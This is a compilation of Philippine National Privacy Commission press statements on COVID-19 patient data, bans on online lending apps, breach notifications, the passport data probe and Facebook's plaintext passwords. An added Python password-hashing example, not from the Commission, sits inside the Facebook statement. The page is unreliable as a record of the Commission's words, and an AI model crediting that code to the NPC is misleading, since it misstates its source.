9. If a PUI has tested positive for COVID-19, can I freely disclose the identity to everyone within the company? The purpose is to inform those who may have had contact with the person so they can be tested and monitored as well.
The company may make the necessary notices internally without disclosing the identity of the person who is COVID-19 positive. The proper authority that does contact tracing is the DOH. It follows that disclosure of the identity of the patient shall be limited to the DOH personnel only, following the PUM/PUI protocol.
Companies should only disclose such personal information as may be necessary to enable other employees to assess their health and potential exposure. Here, revealing the identity of the COVID-19 patient offers no benefit to the patient nor any advantage to other members of the company in assessing their exposure. If someone in your company tests positive, the protocols and guidelines for PUMs/PUIs would apply and, generally, would cover everyone.
10. Can our company issue a press release or statement relating to our employee, who is a confirmed case for COVID-19?
Announcements should come from the DOH or other appropriate government agencies. The government should only make the official announcement regarding COVID-19 cases in the country. Anyone with relevant information should immediately relay it to the DOH for proper handling.
11. Can the DOH release names of PUIs that are purposely evading or escaping mandatory quarantine, as well as those who deliberately lied about their medical and travel history to protect the public and apprise them of the possible threat of contamination?
The DOH needs to consider the following factors when assessing the disclosure of patient information to the public:
- The potential harm or distress to the patient arising from the disclosure.
- The potential damage to trust in doctors and health institutions in general.
and weigh them against:
- The potential harm to the public if the information is not disclosed.
- The potential benefits to individuals and society arising from the release of information.
Apart from the Data Privacy Act of 2012, there is another law relevant to this matter. RA No. 11332 or the Mandatory Reporting of Notifiable Diseases and Health Events of Public Health Concern Act penalizes non-cooperation of the persons identified as having a notifiable disease or affected by the health event of public concern.
The DOH makes the crucial call on what information is necessary for release to the public, taking into consideration the state of public health emergency and the overall strategy to contain the virus as directed by the Inter-Agency Task Force.
12. Can the DOH publicly disclose more detailed information of the frequented locations of the persons positive for COVID-19 to inform the public better and help prevent the transmission of the virus?
Yes. The DOH can provide information about the frequented locations of the persons positive for COVID-19 without giving details that would identify individuals.
*** *** ***
Personal information controllers are advised to approach any uncertainty as to the collection and disclosure of personal data of PUIs, PUMs, and confirmed cases of COVID-19 in a reasonable manner.
We trust that all shall be socially responsible. False information about COVID-19 may create more problems. Please refrain from sharing unverified reports and fake news to avoid undue stress and worry due to misinformation.
Finally, we emphasize that the DOH is the primary competent authority handling our country’s response to the COVID-19. We support our health department, the Inter-Agency Task Force for the Management of Emerging Infectious Disease, health front liners, emergency responders, law enforcement officers, and other persons undertaking our country’s response and measures to curtail and eliminate the COVID-19 threat.
For questions or concerns, you may visit our website at https://www.privacy.gov.ph/ and may reach us at [email protected].
###
-
-
Statement by Privacy Commissioner Raymund Enriquez Liboro on the Declaration of Public Health Emergency in Relation to COVID-19
Comments Off on Statement by Privacy Commissioner Raymund Enriquez Liboro on the Declaration of Public Health Emergency in Relation to COVID-19Data Privacy Vis-à-vis Public Health
Following the President’s declaration of a public health emergency (PHE) concerning COVID-19, it is imperative upon the government to strike a balance between individual data privacy vis-à-vis public health interests, including the public's right to know.
We wish to emphasize that the Data Privacy Act does not prevent the government from doing its job. It follows that the DPA should not prevent government, especially public health entities, from processing personal and sensitive personal information when necessary to fulfill their mandates during a public health emergency.
Government Agencies’ access to COVID-19 information
The proper handling of the health information of Coronavirus patients is crucial in stopping the spread of the virus. Government agencies mandated to address the PHE must have access to the relevant information to accomplish the purpose.
The Department of Health has been cautious in upholding patients’ confidentiality. It is releasing only information that is necessary to protect public health during this time of emergency without sacrificing its duty to determine cases and conduct contact-tracing to contain the virus.
The DOH will be walking a fine line in releasing COVID-19 patient information to the public. Releasing patient information could produce fear and distress but may also lead people to adopt the right precautions to stop the spread of the virus. During times of emergency, it is best to adhere to global best practices (as espoused by the UK General Medical Council) when assessing what type of patient personal information to disclose. We need to consider:
1) The potential harm or distress to the patient arising from the disclosure.
2) The potential damage to trust in doctors and health institutions in general.
and weigh them against:
1) The potential harm to the public if the information is not disclosed.
2) The potential benefits to individuals and society arising from the release of information.
The DOH must continue performing its role and make that crucial call on what information is necessary for release to the public.
Safeguarding Patient Information; Upholding Right to Privacy
Revealing identities to the public, or providing information that could accurately identify people who are under investigation or have contracted the disease, is counter-productive and could do more harm than good. If people believe that their identities will be released to the public when they come forward for testing, they may be discouraged from doing so, making it more difficult for the DOH and the rest of the inter-agency task force to identify more COVID-19 cases.
Any unnecessary disclosure of personal information may stunt government efforts to identify and test individuals with confirmed cases effectively and may have serious consequences, which could be far worse than the disease itself.
Responsible sharing of verified information
Only pertinent information necessary to facilitate contact tracing should be collected, such as, but not limited to, travel history and frequented locations. Likewise, only the information required to enable contact tracing shall be disclosed to the public.
We call on the public and the media to be responsible when sharing and publishing information to ensure the health and safety of everyone. It is prudent to confirm with the DOH’s official statistics and other information before sharing any pieces of information, especially information that would lead to the identification of an individual.
# # #
-
NPC Marks Data Protection Day 2020
Depicting a growing awareness among ordinary Filipinos of the importance of ensuring the privacy of their data, data subjects began sharing their thoughts on the matter in a social media post by the National Privacy Commission (NPC) marking the 14th annual celebration of Data Protection Day.
In a series of Facebook posts themed “Ano ang kwentong data privacy mo?” (“What is your data privacy story?”), the NPC featured testimonials from privacy advocates and professionals, encouraging page followers to chime in and even engage in a light, informative debate.
Serving as conversation starters, elicited testimonials tackled concepts related to safeguarding data, enabling trust, and respect for other people’s privacy in cyberspace.
Some said that with the implementation of the Data Privacy Act of 2012, they became aware and assertive of their rights as data subjects. Others, meanwhile, shared annoying experiences with how certain personal information controllers allegedly handled their data.
One commenter said he became more “conscious and cautious” when sharing personal information, even making it a habit to read privacy notices and policies before agreeing to anything. On the topic of respecting other people’s data, a commenter even raised the concern that the NPC should have secured consent for the testimonials before making them public, to which another commenter responded by explaining the basic concept of having control over one’s personal data.
Data Protection Day is an international event celebrated every January 28, the date on which the Council of Europe's data protection convention, known as "Convention 108", was opened for signature in 1981.
Join the NPC in celebrating the #DataProtectionDay by sharing your thoughts on its Facebook page with the hashtag #AkoAngDataKo.
###
-
NPC shuts down 26 online lending companies
The National Privacy Commission has imposed a ban on the processing of personal data against the operators of 26 online lending applications, as part of the agency’s continuing crackdown on online lenders that resort to publicly shaming borrowers.
In an Order dated 18 October 2019 and published today, the NPC said the companies behind the 26 mobile apps failed to appear before the Commission to answer allegations filed by complainants. Since the apps continue to be available to the public for download, installation and use, the NPC decided to have them banned, saying they are a “continuing threat to the rights and freedoms of data subjects.”
“In order to preserve the rights of the complainants and to protect public interest, the Commission, through its investigating officers, deems it necessary to impose a ban on the processing of personal data until the final resolution of the cases,” the Order reads.
Ordered to stop processing personal data are the entities behind the following online applications: Cash bus, Cash flyer, Cash warm, Cashafin, Cashaku, Cashope, Cashwhale, Credit peso, Flash Cash, JK Quickcash lending, Light Credit, Loan motto, Moola Lending, One cash, Pautang peso, Pera express, Peso now, Peso tree, Peso.ph, Pesomine, Pinoy cash, Pinoy Peso, Qcash, Sell loan, SuperCash and Utang pesos.
The operators of the 26 applications were ordered to immediately take down their online lending operations and make sure that their apps are no longer publicly available for download, installation or use. They were also directed to stop all activities that entail processing of personal data, including those outsourced to third parties, and those that involve use of information from phonebook, directory, and contact list of data subjects, as well as disclosure of false or unwarranted information, and unduly intrusive methods of personal data processing.
The NPC is now coordinating with the National Telecommunications Commission for appropriate action, as well as with Google Play Store operator Google LLC for their compliance, in accordance with the terms and conditions of their platform.
# # #
-
NPC Summons 67 more online lenders
The National Privacy Commission (NPC) today issued summons by publication aimed at 67 unlisted operators of online lending applications that are the subject of data privacy complaints but whose identities and business addresses elude detection.
In an Order for Summary Hearing published in three newspapers of general circulation, the NPC is ordering the board of directors behind the lending apps to appear before the Commission to attend a summary hearing, submit their Responsive Comment, and present their defense.
The Order was specifically addressed to operators of the following online apps:
- Akulaku
- Batis Loan
- Cash bus
- Cash flyer
- Cash loan
- Cash moto
- Cash to go
- Cash warm
- Cashafin
- Cashaku
- Cashalo
- Cashaso
- Cashmoney loan
- Cashope
- Cashwhale
- Crazy Loan
- Credit coin
- Credit peso
- Crutchpil
- First lending
- Flash cash
- Happy cash
- Hello papaya
- JK Quick Cash Lending
- Kwago
- Lalapeso (Mintwagon Lending Corp)
- Lending cash
- Light credit
- Loan champ
- Loan motto
- Loan wallet
- Mabilis cash
- Mango cash
- Mango loan
- Mcmpire
- Megaloan
- MF cash (Microdot Lending Corporation)
- Moola lending
- One cash
- Online loans Pilipinas
- Pautang peso
- Pera advance
- Pera express
- Pera lending
- Pera Pocket (Rainbow Cash)
- Pera4u
- Peso legend
- Peso lending
- Peso now
- Peso online
- Peso Q
- Peso to Go
- Peso tree
- Peso wallet
- Peso.ph
- Peso2go
- Pesomine
- Pesos ph
- Pesos.ph
- Pinoy cash
- Pinoy peso
- Pondo pocket
- QCash
- Sell loan
- Super cash
- Super peso
- Utang pesos
Failure to comply with the Order could result in a ban on their processing of personal data and the elevation of the complaints to the Commission for decision.
“Our investigation team is committed to attending to all the complaints filed against online lending apps. However, to date, only the Uniform Resource Locator (URL) and the developers behind the 67 apps are identifiable. They have no known company name and business address, nor has anyone appeared before the Commission to represent them. Our investigators are aware that some of these online lending apps are just existing in the cloud. With the defendants being unknown, summons by publication is needed in order to comply with the rules on acquiring jurisdiction and the principle of due process,” said Privacy Commissioner Raymund Enriquez Liboro.
Previously, three online lending companies, Fast Cash Global Lending, Inc., Unipeso Lending Company, Inc., and Fynamics Lending Inc., have been ordered to explain before the Commission the allegations contained in NPC’s fact-finding reports.
In the complaints received by the NPC, online lenders allegedly accessed and used the mobile phonebooks of the victims without their consent. Using the phonebook data, the online lenders allegedly informed people in the contact list that they had been named as co-makers or character references by borrowers. In some reports, these contacts were even asked to settle the loan. Agents or representatives of lending apps also posted borrowers’ personal and sensitive personal information on social media sites.
# # #
-
NPC launches Privacy Awareness Week 2019 official website
The National Privacy Commission (NPC) is enjoining personal information controllers and processors in the private and public sectors to celebrate Privacy Awareness Week 2019 (PAW) on May 25 to 31, with Friday's launch of its official event website: paw.privacy.gov.ph.
Pursuant to President Rodrigo Roa Duterte’s Proclamation No. 527 signed last year, the PAW is annually observed every last week of May in recognition of the “need to inform and educate the public about data privacy, data protection and fair information rights and responsibilities as part of reinforcing the efforts of the NPC in protecting personal data and ensuring the Philippines’ compliance with international standards set for data protection.” The PAW is also aligned with the annual effort to raise privacy awareness across member countries of the Asia Pacific Privacy Authorities (APPA), which include the Philippines.
In a recent speech before data protection officers at the New World Hotel in Manila, Privacy Commissioner Raymund Enriquez Liboro announced this year's theme, “Protecting the Digital Filipino: Accountability, Compliance & Ethics in a Data-driven Philippines,” emphasizing the need to continually raise privacy safeguards with a view to fully harnessing opportunities in a digital global economy.
“In a disruptive era of digital transformation, a compliance-centric mindset among personal information controllers and processors would not be enough if our goal is to truly protect the digital Filipino. What we need is to institutionalize a sense of accountability and ethics in the handling of personal data in our organizations,” Liboro said.
New Zealand, a staunch advocate of data privacy and protection, supported NPC’s soft launch with the presence of their Privacy Commissioner John Edwards. In his address to the audience, Commissioner Edwards insisted that companies equip their DPOs with the right tools and systems to ensure the secure storage of personal data and to protect it from threats and attacks. A breach notification system, for instance, helps determine the capability of an organization’s data security system.
During the event, Liboro also announced that the NPC shall hold a flagship event in celebration of PAW 2019 called the 2nd National Data Privacy Conference (NDPC). Slated on May 23 and 24 at the Philippine International Convention Center, the two-day event is by-invitation and expected to draw over 2,000 data privacy professionals.
A notable feature on day 2 of the NDPC is the First Digital Data Governance for the Public Sector, a conference within a conference aimed at driving compliance of government offices with the Data Privacy Act and other laws relevant to the protection of the digital Filipino.
“For the NDPC, we want leading stakeholders to better appreciate their leadership role in terms of compliance and the ever present need to enhance their skills. The newbies, on the other hand, will have a chance to jumpstart their understanding of the DPA and the Commission’s rules and regulations,” Liboro said.
The NDPC was first introduced to the public in 2018 to celebrate PAW.
There are five ways for organizations to celebrate PAW: generate interest; cultivate the habit of privacy mindfulness at the workplace; take pride in their efforts to protect their customers; emPAWer stakeholders by reminding them of their rights; and spread the word using the hashtags #PAW2019 and #PrivacyPH. Data subjects, meanwhile, may practice the NPC’s 30 Ways to Love Yourself Online.
# # #
-
PH, Singapore co-lead the ASEAN Data Protection and Privacy Forum
The National Privacy Commission (NPC) is working closely with Singapore’s Personal Data Protection Commission (PDPC) in developing the ASEAN Framework on Digital Data Governance.
In the 2nd Working Group Meeting on ASEAN Digital Data Governance Framework recently at the Diamond Hotel in Makati, Privacy Commissioner Raymund Enriquez Liboro formally accepted Singapore’s invitation for the Philippines to co-lead the initiative.
"I would like to express my appreciation to Singapore for extending this invitation. The Philippines, through the National Privacy Commission, agrees to co-lead in this initiative and we are honored to take part to further develop and implement a data privacy forum in the ASEAN region, which will bolster data privacy in the region. We look forward to further cooperation with Singapore and all ASEAN member states to foster a community where data protection and privacy thrives," Liboro said.
Endorsed last December by delegates of the ASEAN Telecommunications and Information Technology Ministers, the framework is aimed at strengthening the region’s data ecosystem. This includes achieving legal and regulatory alignment of data regulations and governance frameworks in the region; and fostering data-driven innovation to boost growth of digital economy.
The Philippines would specifically co-lead one of the framework's four initiatives, the ASEAN Data Protection and Privacy Forum. Its two target outcomes are to harmonize legal and regulatory landscapes in the region and to develop and adopt best practices.
To date, the Philippines is one of only three Southeast Asian countries with a comprehensive data protection law and a fully established, functioning data protection authority.
# # #
-
Press Statement of Privacy Commissioner Raymund Enriquez Liboro RE: BREACH NOTIFICATION BY CEBU AIR, INC.
1. At 11:37 AM today, Cebu Air, Inc. emailed a preliminary notification to the National Privacy Commission informing us of an “unauthorized breach” of its website’s database (www.getgo.com.ph), as prescribed by NPC protocols.
2. In the notification, the company’s Data Protection Officer (DPO) Randall Evangelista, said the “extent and nature” of the breach is still being determined.
3. Following this, we have instructed DPO Evangelista to also ascertain if there is a need to inform affected data subjects of the breach, along with specific precautions and other measures they may take to protect themselves. We have instructed Evangelista to personally report tomorrow to the NPC complaints and investigation team.
4. The NPC shall issue public updates on the incident as they become available.
# # #
-
NPC cautions offices on personal data protection issues during Holy Week 2019
The National Privacy Commission (NPC) is reminding public and private offices to be extra vigilant against hackers and data thieves this Lenten break.
Privacy Commissioner Raymund Enriquez Liboro said Personal Information Controllers (PICs), Personal Information Processors (PIPs), and Data Protection Officers should ensure that personal information under their organization’s care is safeguarded from potential cybersecurity attacks, the likelihood of which may increase during long holidays.
“Digital and physical break-ins are more likely to occur during long breaks when there’s minimal staffing in offices,” Liboro warned. “The use of strong passwords is essential in protecting personal information from malicious intentions. One precaution that PICs, PIPs, and DPOs should take during the long break is to password-protect or encrypt files and databases on servers, computers, and other devices in their organization. If necessary, change passwords.”
Take note of the following recommendations:
- Place non-mission critical systems off-line, especially those that contain or have access to personal data.
- For systems that must remain online over the break, make sure that all system activity is logged and that the logs are secured.
- Back up files (digital and non-digital), systems (e.g. server access, files, logs), and databases. If possible, do not take backups outside the office, such as on portable devices.
- Ensure that respective workstations are shut down properly and electrical connections are cut off accordingly.
- Discourage physical security breaches by securing office premises adequately. Keep personal valuables safe.
- Make sure all physical documents containing personal information are secure in locked file cabinets.
- Log out all accounts in computers.
- Ensure that proper system updates are done to ensure that your system and even computers are protected from threats and possible attacks.
- Ensure that appropriate security controls (e.g. firewall, anti-virus, intrusion detection) are in place and working properly.
- Ensure that the organization has a response and recovery plan that would be useful in times of emergencies, disasters, or even system attacks.
- Ensure that the employees are reminded and/or educated regarding the organization's security measures that must be observed (e.g. accessing work documents outside the office premises).
# # #
-
Statement of Privacy Commissioner Raymund Enriquez Liboro on the recent April Fool’s hacking incidents
1. From 1 April 2019 until yesterday, the National Privacy Commission gathered reports and claims of alleged hacking incidents affecting certain websites that may have involved personal data.
2. The incidents include hacking of individual user accounts on Facebook, Twitter, Yahoo, and Wattpad, among others. There were also some websites operated by some private and public organizations that were hit.
3. At least one group of local hackers has claimed ownership of these acts.
4. We expect to learn the details from affected Personal Information Controllers (PICs). Upon discovery of a personal data breach, and upon meeting certain criteria, a PIC has 72 hours to notify the NPC and the affected data subjects of the scope, nature, and extent of the data breach. In any event, appropriate actions should be taken to safeguard data subjects.
5. Under the Data Privacy Act, the failure to timely report a data breach is punishable by up to 5 years imprisonment and a fine of up to 1 million pesos upon conviction. Unauthorized Access or Intentional Breach is punishable by up to 3 years imprisonment and a fine of up to 2 million pesos upon conviction. Likewise, responsible officials of PICs who prove to be negligent in safeguarding personal data may also face imprisonment of up to 6 years and a fine of up to 4 million pesos upon conviction.
6. These hacking incidents are now under investigation.
7. Meantime, data subjects who may have been affected by any of these or similar incidents may call the NPC complaints line at 022342228 (local 114) or email us at [email protected].
# # #
-
Statement of Privacy Commissioner Raymund Enriquez Liboro on Facebook’s Use of Plain Text in Stored Passwords
1. Today Facebook announced that millions of users’ passwords were discovered in January to have been stored in a readable format within its internal data storage systems. This first came to light through a revelation by a security expert, who claims that the practice has been going on since 2012 and that the passwords could be accessed by more than 20,000 Facebook employees.
2. The storage of Facebook passwords in plain text needlessly exposed people to risk. Passwords that are stored in plain text are more easily and readily stolen by those who intend harm; they may even be compromised by accident.
3. In a conversation this afternoon with Facebook Privacy and Public Policy Manager for Asia Pacific, Arianne Jimenez, we sought more details. Jimenez reaffirmed that they found no evidence so far that anyone internally abused or improperly accessed the said dataset and said they will be notifying everyone affected.
4. Even if there is no evidence of abuse, there is little comfort in knowing that the world’s largest repository of personal data practices such lax internal controls. In a 2018 study, the Ponemon Institute (a global information security think tank) found that 60% of businesses indicated that their data breaches come from negligent employees or contractors. 1
5. If you are affected and you receive notice from Facebook, change your passwords immediately and enable multi-factor authentication. Begin to exercise better digital hygiene. For more information, visit our 30 Ways to Love Yourself web post at privacy.gov.ph/30-ways/.
1 https://keepersecurity.com/assets/pdf/Keeper-2018-Ponemon-Report.pdf
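To make the contrast in items 1 and 2 concrete, the following is an added example (not Facebook's code and not part of the NPC statement) that places the flawed practice, storing the password itself, beside the standard alternative: deriving a salted verifier with a slow key-derivation function and comparing in constant time. It uses PBKDF2-HMAC-SHA256 from the Python standard library; the algorithm label, iteration count, salt and key sizes, and record layout are this example's assumptions, and the sample password is constructed.

```python
import hashlib
import hmac
import os
from typing import Optional

# All parameters below are this example's assumptions, not values from the NPC statement.
ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 600_000      # work factor; raise over time as hardware gets faster
SALT_BYTES = 16           # per-user random salt defeats precomputed (rainbow) tables
KEY_BYTES = 32            # derived-key length


def store_plaintext(password: str) -> str:
    """The flawed practice described in the statement: the stored record is the
    password itself, so anyone who can read the store (an insider, a log scraper,
    an attacker holding a database dump) can log in as the user."""
    return password


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = ITERATIONS) -> str:
    """Derive a verifier from the password with PBKDF2-HMAC-SHA256 and a random salt.

    The record is self-describing (algorithm$iterations$salt$key, binary parts in hex)
    so the work factor can be raised later without invalidating existing accounts."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                                  iterations, dklen=KEY_BYTES)
    return f"{ALGORITHM}${iterations}${salt.hex()}${derived.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute the derivation with the stored salt and iteration count and
    compare in constant time. Malformed or foreign records never verify."""
    try:
        algorithm, iterations_str, salt_hex, key_hex = record.split("$")
        if algorithm != ALGORITHM:
            return False
        iterations = int(iterations_str)
        salt = bytes.fromhex(salt_hex)
        expected = bytes.fromhex(key_hex)
    except ValueError:
        return False
    if iterations < 1 or not expected:
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                                    iterations, dklen=len(expected))
    return hmac.compare_digest(candidate, expected)


def needs_rehash(record: str, iterations: int = ITERATIONS) -> bool:
    """True when a stored record uses a lower work factor than current policy
    (or an unknown layout), so it should be re-derived at the next successful login."""
    parts = record.split("$")
    if len(parts) != 4 or parts[0] != ALGORITHM:
        return True
    try:
        return int(parts[1]) < iterations
    except ValueError:
        return True


def login(password: str, record: str, iterations: int = ITERATIONS) -> Optional[str]:
    """Return the record to keep (upgraded if the policy moved on) on success, None on failure."""
    if not verify_password(password, record):
        return None
    if needs_rehash(record, iterations):
        return hash_password(password, iterations=iterations)
    return record


if __name__ == "__main__":
    # Constructed demonstration input.
    secret = "correct horse battery staple"
    print("plaintext record :", store_plaintext(secret))   # readable by anyone with store access
    record = hash_password(secret)
    print("hashed record    :", record)                    # reveals nothing usable about the password
    print("verify correct   :", verify_password(secret, record))
    print("verify wrong     :", verify_password("Tr0ub4dor&3", record))
```

Two records derived from the same password differ because each carries its own salt, so a leaked table cannot be attacked with one precomputed dictionary, and the per-guess cost of the iteration count is what slows an offline attacker down. The iteration count is a policy knob: `needs_rehash` lets the store migrate to a higher count transparently at each user's next login rather than forcing a reset.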
-
NPC postpones submission of 2018 Annual Security Incident Report
The National Privacy Commission (NPC) has indefinitely postponed the submission of the Annual Security Incident Report (ASIR) covering calendar year 2018.
The Commission is currently revising some of its key processes with a view to enhancing reportorial efficiency and harmonizing document submissions with the Department of Information and Communications Technology. The revisions aim to improve the user experience for Personal Information Controllers (PICs) and Personal Information Processors (PIPs) in the private and public sectors.
The ASIR is a compliance requirement for PICs and PIPs under the Data Privacy Act’s IRR. It is a way to document security incidents, enabling PICs and PIPs to better anticipate risks and threats.
PICs and PIPs are advised to continue documenting security incidents as usual and stay updated on related NPC announcements.
Meantime, those who have accomplished the 2018 ASIR and wish to submit it may still do so at any time via email to [email protected], through our digital portal, or by hard copy submission using the current template.
-
Statement of Privacy Commissioner Raymund Enriquez Liboro on the Mobile Number Portability Act recently signed by President Rodrigo Roa Duterte
1. We laud President Rodrigo Roa Duterte for signing the Mobile Number Portability Act. The law provides mobile postpaid or prepaid subscribers with a mechanism to retain an existing mobile number despite moving from one mobile service provider to another. This gives data subjects control over their data, which is a basic tenet of the Data Privacy Act.
2. The National Privacy Commission supports the proper implementation of this law which promotes consumer welfare and fosters innovation and competition in the telecommunications industry.
3. We likewise recognize this measure as an embodiment of the right to data portability provided under Section 18 of the Data Privacy Act of 2012 (DPA). This right gives data subjects the mechanism to obtain their personal data in an electronic or structured format from personal information controllers, if such personal data is being processed through electronic means, and enables the further use of such personal data by the data subjects.
4. We shall continue to work with the National Telecommunications Commission (NTC) and all concerned agencies tasked to implement this law and provide additional inputs in the crafting of the Implementing Rules and Regulations (IRR) and other policies, as may be necessary and appropriate.
5. In the implementation of the Mobile Number Portability Act, the NTC, together with the NPC, shall endeavor to ensure that public telecommunications entities handling the subscribers’ personal data shall strictly adhere to the provisions of the DPA, and provide safeguards to protect said personal data in the course of porting activities, bearing in mind the data privacy rights of the subscribers.
###
-
Privacy Commission extends validity of registration until 2020
Personal Information Controllers (PICs) and Personal Information Processors (PIPs) that completed at least Phase I of their registration with the National Privacy Commission (NPC) by 2018 are not required to renew their registration this year. The validity of their registration is extended until 8 March 2020.
They are also entitled to an official digital certificate of registration, available upon request with the NPC.
PICs and PIPs covered by NPC Circular 17-01 that have not yet registered are still required to register their Data Protection Officer to avoid possible liabilities. For instructions on how to comply with this requirement, please click this link.
For more details, refer to the FAQ page or contact us at:
Email Address: [email protected]
Phone Number: (02)510-83-09
Mobile Number: +639451534299 TNT / +639652863419 TM
-
Official Statement of Privacy Commissioner Raymund Enriquez Liboro on the Cebuana Lhuillier Breach
1. On Friday, 18 January 2019, representatives from Cebuana Lhuillier went to the National Privacy Commission to seek assistance regarding a data breach involving their email server. At the meeting, they committed to submit a more detailed report regarding the data breach. Cebuana Lhuillier informed us that it has engaged the services of a third-party information security service provider to handle their mitigation and response to this incident.
2. We await further details as to the scope and severity of the breach.
3. Cebuana Lhuillier has 72 hours from discovery of a data breach to report the same to the Commission and affected data subjects. The data subject notification must be done individually, and must not further expose the data subject to more harm.
4. This incident is now under investigation.
-
NPC opens passport data probe
The National Privacy Commission (NPC) has granted the Department of Foreign Affairs (DFA) 5 more days before formally facing its preliminary fact-finding inquiry on the passport data issue.
In a meeting this morning, the NPC’s Legal and Enforcement Office asked DFA representatives headed by Director Anthony A.L. Mandap to give preliminary details surrounding the issue. Mandap said he was sent to the meeting just to “formally convey” their written request for postponement since they are “still conducting an internal investigation”. He said he could not speak beyond the scope of what was written in the request.
In the letter sent to NPC late Tuesday afternoon, the DFA’s Data Protection Officer (DPO) Menardo G. Macaraig said the DFA’s own “preliminary inquiries on the matter indicate that there was no data breach because the Asia Productivity Organization Protection Unit, a government-owned and controlled corporation and recognized government printer, remain in custody and control of said data, and that said data has not been shared with or accessed by an unauthorized third party, which may use it for illicit purposes”.
Speaking to media reporters, Privacy Commissioner Raymund Enriquez Liboro said today’s initial meeting may have been brief but productive.
“The NPC’s investigation continues. In their own preliminary probe, the DFA said it is in control of the data. That says a lot already to assuage the public. The data in question is not controlled by any unauthorized parties. That was what today’s meeting with the DFA established. The data is under their safekeeping,” Liboro said.
Commissioner Liboro looks forward to next Monday’s fact-finding meeting, which will include representatives from both the DFA and APO.
“The lessons we could learn from this incident would go a long way in ensuring better government practices. They would form part of the recommendations the NPC shall later issue to government offices contracting third parties. We’re looking to the future for ways to further protect personal data. The law obliges data controllers like the DFA to strictly implement contractual means to protect data when they deal with third parties and government contractors. We look forward to improving on that based on lessons we learn here,” Liboro added.
###
-
Press Statement of Privacy Commissioner Raymund E. Liboro on DFA's Claim Regarding Philippine Passport Data
The National Privacy Commission shall conduct its own investigation on the Department of Foreign Affairs’ assertion that a private contractor has caused the non-availability of Filipino passport data and other documents entrusted to it for processing.
Any form of non-availability of personal data, infringement of the rights of data subjects, and harms from processing that include inconveniencing the public, must be adequately explained to the satisfaction of the law.
We will summon the DFA and concerned agencies including the alleged contractor to determine the facts surrounding the case.
Rest assured the NPC will continue to champion the rights of Filipino data subjects.
-
NPC launches DPO ACE Program, sets benchmark for data privacy training in PH
The National Privacy Commission (NPC) today unveiled its DPO Accountability, Compliance, and Ethics (ACE) Program, aimed at establishing a skills benchmark for local privacy professionals, amid the spike in demand for high-quality data privacy trainings in the country.
Around 50 practicing Data Protection Officers (DPOs) from leading government offices and top corporations attended the pilot class of the DPO ACE Program, which comprises three days of intensive lectures and workshops from December 12 to 14, at the 2nd Floor, Secretariat Building, Philippine International Convention Center, Manila.
In his keynote, Privacy Commissioner Raymund Enriquez Liboro stressed the importance of building trust in today’s digital world, a key concern where DPOs can make a real difference.
“The ACE Program will align all of us in doing the right things right. Overall, the program aims to build privacy resilience and culture in whatever milieu you are living and working in,” Liboro said.
The Privacy Commissioner said, “data ethics are the brakes we need now,” emphasizing that it would be the NPC with the help of DPOs, who are called upon to make judgement calls on behalf of data subjects. “Who else will remind everyone that behind binary 1’s and zeroes are actual human beings that could be adversely affected by unethical use [of data],” he added.
The latest McKinsey Report stated that cross-border data flow has swelled to more than 210 terabytes per second, or about 1.6 billion selfies a minute. He noted that the world is on the cusp of a digital transformation that has given birth to new industries and forced old ones to adapt.
Liboro said the program fulfills the NPC’s goal of training an entire generation of DPOs prepared to embrace ethical data processing, saying that DPOs are the representatives of the NPC in their organizations.
“Ultimately, DPOs protect their organizations above all. It is in the interests of everyone – data subjects, the NPC, personal information controllers, and DPOs – that the processing of personal data is handled with clear lines of accountability, in compliance with the law, and in the most ethical way possible,” Liboro said.
The ACE DPO Program has three levels and comprises advanced case studies and practical and written exams. Those who pass will be issued a certificate reflecting their DPO skill level: ACE-1, ACE-2, or ACE-3.
Among the participants in the pilot class are DPOs from diverse organizations, including the Department of Trade and Industry, Department of Information and Communications Technology, Smart, Inc., ABS-CBN, San Miguel Corporation, IBM Philippines, Ospital ng Muntinlupa, MoneyGram, Home Credit, Cebu Pacific, De La Salle University, LBC, Philippine Hotel Owners Association, IT & Business Process Association of the Philippines, Pharmaceutical & Healthcare Association of the Philippines, Asian Institute of Management, and the Association of HMOs of the Philippines, Inc.
The NPC will make the DPO ACE Program publicly available to all interested DPOs beginning next year, alongside its other major initiatives, such as the PSST! (Privacy, Safety, Security, and Trust Online) campaign, the Data Privacy Council, and Privacy Watch, which shall also be rolled out in the regions.
Demand for data protection officers is rising worldwide as the global technology industry booms. The International Association of Privacy Professionals estimated that around 75,000 DPOs are needed all over the globe. DPOs are most sought-after in industries processing large amounts of personal data, such as technology, finance, healthcare, retail, and digital marketing.
# # #
-
NPC lauded for PH’s global leadership spot in ICDPPC
International and local governing bodies have commended the National Privacy Commission (NPC) for earning a global leadership role for the Philippines in international discussions on data privacy.
Privacy Commissioner Raymund Enriquez Liboro represented the country in the International Conference of Data Protection and Privacy Commissioners (ICDPPC) held in Brussels, Belgium on Oct. 23. Following closed session deliberations, the Philippines emerged as one of the five members of the Executive Committee, joining Australia, Canada, Burkina Faso, and the United Kingdom, which got the chairmanship this year under Commissioner Elizabeth Denham.
New Zealand Privacy Commissioner John Edwards is confident the NPC under Liboro would serve to “invigorate” the committee and bring a “really strong voice” to the constant transatlantic conversation about data privacy by introducing “different legal and cultural traditions.”
“It’s so good to have such a new Commission take a central place on the international stage, I hope that you have success. I have great confidence in Raymund [Liboro’s] ability to represent the Philippines and the Asia-Pacific region at our international forum,” Edwards said.
Senator Gregorio Ballesteros Honasan expressed support for Liboro and hailed his win for the country in the international body as one more opportunity to serve people.
“Congratulations on your recent appointment to the ICDPPC. Continue serving God, country, family, and of course, the highest – public interest," Senator Honasan said.
The Presidential Communications Operations Office (PCOO) viewed NPC’s election as a testament that the international community is beginning to recognize the Philippines' efforts in the development and improvement of the country’s data protection and privacy regulations.
PCOO Assistant Secretary Michel Kristian Ablan credited this success to Liboro’s “impeccable integrity” and vision – qualities that ICDPPC leaders must possess. Ablan believes the election will help the Philippine government adopt global standards in strengthening and enhancing current systems, practices, and policies in data management and protection of its economic institutions.
“This development is also expected to heighten local and international consumer trust and confidence in these institutions, especially the digital market, which is now considered as a major contributor to economic development,” Ablan said. “Investor confidence in the Philippines will increase and hopefully will translate to increased direct foreign investments which should boost employment and local industries.”
In a public post on its official Facebook page, the Ayala Corporation extended its congratulations to and support for Liboro.
